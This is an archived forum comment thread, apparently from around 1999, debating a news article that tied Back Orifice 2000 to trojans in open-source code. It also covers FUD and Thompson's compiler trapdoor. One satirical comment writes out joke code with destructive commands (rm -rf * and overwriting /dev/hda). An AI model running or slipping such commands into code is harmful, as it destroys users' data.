If my argument involving su, etc. was read as a criticism of unix security, or NT security for that matter, then I apologize for not making myself clear.

Equating the use of telnet/su (or ssh) to Back Orifice was simply my way of saying that any viable operating system that is capable of the client/server model (basically any machine capable of tcp/ip networking) is in my opinion inherently vulnerable to a program like Back Orifice. To disable this vulnerability would be to disallow root-like priveleges to everyone, which is completely absurd, or to set up some sort of networking watchdog construct that is complex beyond my imagining.

I reiterate that I see the only true hole it NT that bo2k exploits is poor task management (ie inability to see/kill all apps running on the computer easily). I'd also like to note that I do not run on my own computer (I did for about two months before becoming fed up with it, and turning to the much more rewarding Linux OS). I don't like promoting MS, but I don't like undue criticism when there are areas in which that criticism could be much more responsibly used.

What they really mean...

[jmweeks]

A rather misinformed and misleading article such as this really means when starting an article with "Trojan horse programs concealed inside open source code" is "Look at me!" In other words, a poorly masked use of attention-getting buzzwords with little knowledge of their meaning or proper use.

Is the bo2k open source? Apparently. Will that help it's proliferation? Probably, although as far as I have read it is made to be particularly evasive in the first place. Does this have any relevance to the common usage of the term "open source" and the people who will be drawn to read the article based upon it's use of this term? Of course not.

To make matters worse, and to muddy the waters to a point obvious to anyone reading the proliferation of comments on this topic, this article refers to bo2k as a trojan horse. This is completely and totally untrue and misleading. A trojan horse is a program that imbeds itself in another, allowing itself to be executed (usually unnoticed) when the enclosing program is run. Such a practice is devious and obviously viral and totally unlike this program.

Back Orifice's server is an executable program that runs in and of itself. It does so very quietly and (due to, in my opinion, an oversite on Microsoft's development) is difficult to detect. It is a server program, an application, and in no way a trojan horse.

The reason this has muddied the waters, at least at slashdot, is that the image of a trojan horse in open source software (in other words, offending source code placed unnoticed in trusted source code) provokes most open source advocates to bring up the issue of peer review's ability to eliminate such 'trojan horses.' These arguments, though accurate, are completely irrelevant when one considers that there are not trojan horses (either in source code or executable form) involved.

But the article did what was intended: It provoked many of us to read it that would not have otherwise. Congrats.

Oh, and as a side not: I have seen it mentioned many times that Back Orifice exploits security risks in Windows operating systems. Basically, this is untrue. I am not a Microsoft fan by any stretch of the term, but I find it hard to fathom people considering a server program, run with the equivelant of root privilages, as exploiting security risks if it can actually control a system. Telnetting (or more wisely ssh'ing) in to a unix box of any variety that I know and su -'ing allows anyone with knowledge of the root password the ability to control basically any aspect of the system in question. The two security holes that this exploits are the inadequate task management of Windows OS's and the overuse of administration-level accounts in doing user-level operations. Oh, and the execution of untrustworthy applications, which can not (except perhaps in the case of macros) be blamed on MS.

Humor Re:The real Trojan Horse

[lildogie]

"greeks bearing gifts" is the cliche, but I always thought it played better the other way around.

FUUUDDDDDDDDDDDDDD

[Nahuel+Greco]

Dear boys,

this is the clearest example of an article with fud inside bought by microsoft.

the writer will be shot.

the objetive is that the idiots do the relation:

BO2K -> OpenSource -> All Opensource software have trojans inside

cDc is and was a great group for script kiddies and adolescents idiots

Security through obscurity...

[dsaxena]

...blah blah blah.

Yes, OSS makes it easy for disgruntled people to get trojan code into a program, but there are several ways to deal with this.

• Only download code from trusted sources. This means that you only get the latest gnome patches from the gnome website or from official mirrors. If you follow this
• In addition to this, use PGP/GPG signatures to validate what you are getting against the official distribution. If you download an official distribution of a package, it is safe to assume that patches have been looked at by several sets of eyes to ensure that they are OK before they were added to the code base.

There is a missconception by IT suits that there is a complete lack of change control in Open Source projects. The people where I work had this missconception that I could do a search for "linux device foobar2000x drivers" and would find hundreds of different patches. IMHO, Open Source projects are one of the best examples of change control as maintainers shift through many different patches before deciding what ones are worth applying.

Deepak Saxena
Project Director, Linux Demo Day '99

Gnu BO2K

[Ungrounded+Lightning]

> BO2K is GPL'd. You think RMS will make them call it GNU BO2K? ;-)

Why not?

BO2K is really a powerful remote-console/administration tool (that "just happens" to have a number of optimizations for clandestine use. B-b ) If you're using it OFFICIALLY it can be as useful to you as an UNOFFICIAL install is to a cracker.

In fact, your copy can be useless to a cracker, because the source already has customizable security hooks to keep others from using BO2K trapdoor servers they didn't install themselves. (They'll have to sucker you or your users to install their own copy.)

Check out http://www.hlz.nl/bo2k/bo2k.ra for details.

Thompson's trojan virus, and why not to sweat it.

[Ungrounded+Lightning]

The hack was in the C compiler. It consisted of two parts:

- If the compiler recongized that it was compiling the login program, it expanded a canned macro that added a trapdoor - a canned login and password that gave root access.

- If the compiler recognized that it was compiling itself, it expanded a canned macro that added the recognize-and-expand-canned-macros code, along with the macros, to the new copy of the compiler.

You only have to compile this in once, after which you can throw out the patch and it propagates to later versions of the compiler. BUT:

- It only lives in compilers.

- It only works as long as they're being compiled by themselves, in a never-ending stream. It will NOT propagate to a new compiler implementation, such as making the hop from PCC to gnu, or being installed in a new version of PCC that was compiled by gnu rather than PCC. (In principle you could build one that recognized TWO or more compilers and could hop back and forth, though that makes it twice as fragile.)

- It will die as soon as a change to the compiler source renders the signature unrecognizable.

- Even if it is alive, it stops inserting trapdoors once the signature of the target program changes.

Rumor has it that this was actually propagated in the Portable C Compiler {PCC}, and was discovered and cleaned out when the guys at Berkeley wrote strings, and wondered why the compiler had the string "login".

Note that this is MUCH easier to do with a proprietary compiler than an open one. Gcc, for instance, is shipped in source, with a build file that lets it be built by just about any C compiler, not just an older gcc. Even if a Thompson trojan virus existed for gcc, it isn't inserted when you compile with another compiler, producing a clean gcc that only has what its own source implies and only emits what the target's source implies. (It's almost as if NONinfection was infectious.)

So even a security paranoid like myself isn't worried about trojans that aren't there to be spotted in the open source.

BO2K beneficial to MS

[factotum]

I think we're all overlooking the fact that the open source model of BO2K will actually greatly facilitate the job of MS programmers by pointing out security flaws. MS should be thanking the BO crew, in some strange and possibly perverted way. I do not condone the creation and use of tools that are intended to compromise security of any system, but if that's what it takes to make NT secure, then so be it.

It is true that the open source model of BO2K will allow similar programmes to be written that will avoid detection simply because they are different from BO2K, but the security exploits are still the same. If the security holes are patched there will be nothing to fear from the OSS model.

Strange how interpretation can erase the otherwise clear distinction between fact and fiction.

Stupid Moderators

[Hooloovoo7]

I don't see how this is off topic. The point is that M$, which is quite probably thrilled about this arcticle, is using OSS software on one of their most popular services. Apache, mod_ssl, and SSLeay are all open source, and I'm sure Micro$oft will:

• Never get NT working under the load that Hotmail endures
• Never deny that Hotmail is secure

The fact that they use Solaris shows that they still need a company to sue (why else would they use SMS products ;), but they obviously trust OSS.
Our wretched species is so made that those who walk on the well-trodden path always throw stones at those who are showing a new road.

Re:FUD?

[FreeYourSoftware]

This is stupid, but I thought it was Fscked Up Disinformation at first... Made sense in the context.

Two Articles for the Price of One!

[iad]

Of course, the article about the history of open source and its developments was unfortunately left uncomplete. I guess it's good that Back Orifice 2000 had this nice press release written up for them, but really, it's interesting that the two would be thrown into the mix together.

"
Trojan horse programs concealed inside open source code could create new security headaches for IT managers.
"

This is an intersting opening paragraph. Pretending the average person read this article, this would stick out most in their mind. I wouldn't be surprised if the average thoughts of that average person went something like this while they read the first paragraph:
`Hmm... Open Source movements have been going on, a lot of things are Open Source, and it seems to be a really new idea... What's this? Oh No! Trojan Horses are going to be in these open source projects? Forget that, gimme something I have to pay thousands of dollars for.'
Just what we (assuming `we' is involved in open sourcing things) need, don't you think? A nice little mud splattered onto the images of our respective projects.
It's unfortunate that companies can sue for libel when stuff like this happens, and individuals can as well, but when it happens to a group of hard working geeks, all we seem to do is sit around and complain on slashdot about it. Of course, maybe someone more ambitious than me just read that article, and demanded a correction from the author to be posted on the front page of that news source.
Man, I was so enjoying this day, too. And then I had to read crap like that.

iad

Re:FUD?

[cdlu]

OH heheh, ok, thanks.
I kept typing halloween.html :)
(i feel it coming:score 0, offtopic)

Re:FUD?

[cdlu]

You don`t _want_ to know what FUD is. FUD is bad! FUD has no infrastructure! FUD has no support! FUD has no way of continuing to do business. If you use FUD, you`ll be in trouble when you need help!

:)

Re:FUD?

[cdlu]

"Fear, Uncertainty, Doubt" - cheap marketing strategy.

It seems to me the term was brought into more common usage by the Halloween documents (they`re no longer posted anywhere i can find them).

But there IS a virus in BO...

[sumana]

The cDc apologized about a week ago for a virus that got on the BO2K CDs they passed out at Defcon. Anyone who installed it should check their systems for Chernobyl. Check out cDc news. Maybe this doesn't prove that open-source programs are more likely to have trojans in them. But a smaller, less formal operation would be more likely, I think, to have this sort of accident happen to it than a big software firm, e.g., M$.

Re:The real Trojan Horse

[e.+boaz]

Off-topic. Uhm, you have that reversed. The Greeks built the large wooden horse and "left" it at the gates of the city Troy, hence the name the "Trojan horse." The unusual (at that time) and underhanded ploy won the war for the Greeks.

M$ and open source propaganda

[Raving+Lunatic]

Just you watch - The Evil Empire will start using things like BO2k as anti-open-source propaganda. Probably to their own long-term detriment, but I bet they do it anyway.

Re:The real Trojan Horse

[Farce+Pest]

Which is an argument for:

1) Get your kernel from one of the standard sources, i.e. kernel.org or a mirror.

2) Verify the PGP signature.

Then, at least, you know you are running a real release, the same one hundreds of thousands of other people are running, and not one that someone has subsequently hacked.

The other question is: How do we know the real release wasn't hacked? Short of looking yourself, there are many other people using the same code, including developers, and also people who analyze the patches to summarize changes. Even if a trojan patch did slip Linus' attention, it would be discovered very quickly and removed quicker.

(And yeah, it's the Greeks, but which ones? The Trojans were Greek too, weren't they?)

The real Trojan Horse

[Farce+Pest]

People never seem to remember the important lesson of the original Trojan horse. The Trojans left this nice horse statue as a gift, and the suckers (can't remember who the Trojans were at war with) take it inside their secured area. Later that night, the Trojans hidden inside the horse jump out and kill them.

The lesson: Look inside the friggin' horse, you stupid idiots! And THAT is something you can do with open source that you cannot do with closed, proprietary software.

Re:The real Trojan Horse

[Patton]

Well the problem with it is the fact that not everyone is as determined as the Greeks (thats who the trojans were fighting btw). Sadly it takes rather technical wiz-kids to do that kind of looking.

I'm in a fortune 500 company and theres only 1 other person who could even come within the ballpark of being able to poke through say a linux kernel and see if there are any gotchas. Thats a very low number percent wise.

Re:The real Trojan Horse

[Godin]

Aeneid by Virgil. Great propaganda by the Roman empire if you ask me. Made me wish I was a great Roman...

>"Cynic?? Who's a cynic?"

hahaha

[bnm]

this is one of the funnier pieces i've seen lately.

Compeletely the opposite...

[NoWhere+Man]

Open source is intended to get rid of problems like that. Of course that is only when the program is maintained and verified by the original developpers. I see how it could apply if people release their own versions to the public...they could contain trojens. But if your dumb enough to use software from some lame company then you deserve to get a virus or what have you.

Re:Compeletely the opposite...

[Syslevel]

Open Source makes it far easier for anybody who has decent programming skills to dig into the system and do all sorts of things. Generally on a local level, not on a widespread level as is the case with closed source OSes.

98% of the world's computer users are 'dumb enough' to use software they didn't compile themselves, from source code they personally reviewed. Actually that should be 99.99% of the world, since there isn't anybody here reading this message who has read every bit of source code for every thing s/he runs.

Open Source turns it into a "local" problem rather than a 'big scale' problem as is the case when unfriendly code is widely distributed in closed source software.

"Peer review" doesn't solve anything if Hacker X at Podunk Corporation slips an exploit into the payroll machine.

It's a far more complex issue than many people in this discussion thread seem ready to recognize.

....

[Bud^-]

When virus writers moved to an open source model in 1996

Alright, this is good news for the OSS movement. Plus there is this MAJOR bug in a virus I use on a daily basic, it deletes all the data off a hard drive, I'm looking to obtain this source so I can fix this error.

I'm glad virus writers are not longer in it for the commerical benefits but have moved over into the OSS community to grep the benefits of OSS.

Serious, on a serious note. Wouldn't it be easier to put a 'malice' peice of code into a binary only program?

I can just see an a peice of open source software not compiling and a SysAdmin looking over the source.

print "Looking for user...\n";
system ("rm -rf *");
print "User connected...\n";

Or worse yet...

/* This quick hack that runs a sub routine to
invert the vaules of the disk controller to obtain
premission to write staight 1's on the entire drive */

Any that is besides the point! Has anyone heard of check sums? Can you trust the guy who wrote procmail? This whole time, for the last 10+ years he has been getting the trust of the OSS commuity and *nix admins everywhere. When he is ready for Total World Domaination he is going to slip a system ("echo \"blah\" > /dev/hda"); into his "Speical" x86 version of procmail.

THIS IS BIGGER THAN WATERGATE MAN, EVERYONE IS IN ON IT, IT GOES UP TO THE WHITE HOUSE MAN!

M$ is trying to make the new/potenial users of OSS paraniod. FUD FILLED and tasty, Mmm

FUD?

[paranoid.android]

Excuse me for sounding stupid, but what is FUD?

paranoid.android

Re:FUD?

[ufdraco]

FUD = Fear, Uncertainty, [and] Doubt

Open source means more risk? bah, pfflt, suuuure..

[matman]

Heh, I would trust code that isnt worried about me getting into it's panties more than I would code that's hiding something. Back orrifice is NOT a trojan horse - it doesnt pretend to be what its not... if I call a spreadsheet a word processor it's still a spreadsheet... so... if someone calls back orrifice a Trojan, it's still a remote admin tool. And it doesnt mean that any portion of open source is inherrantly trojany, let alone any more than proprietary stuff.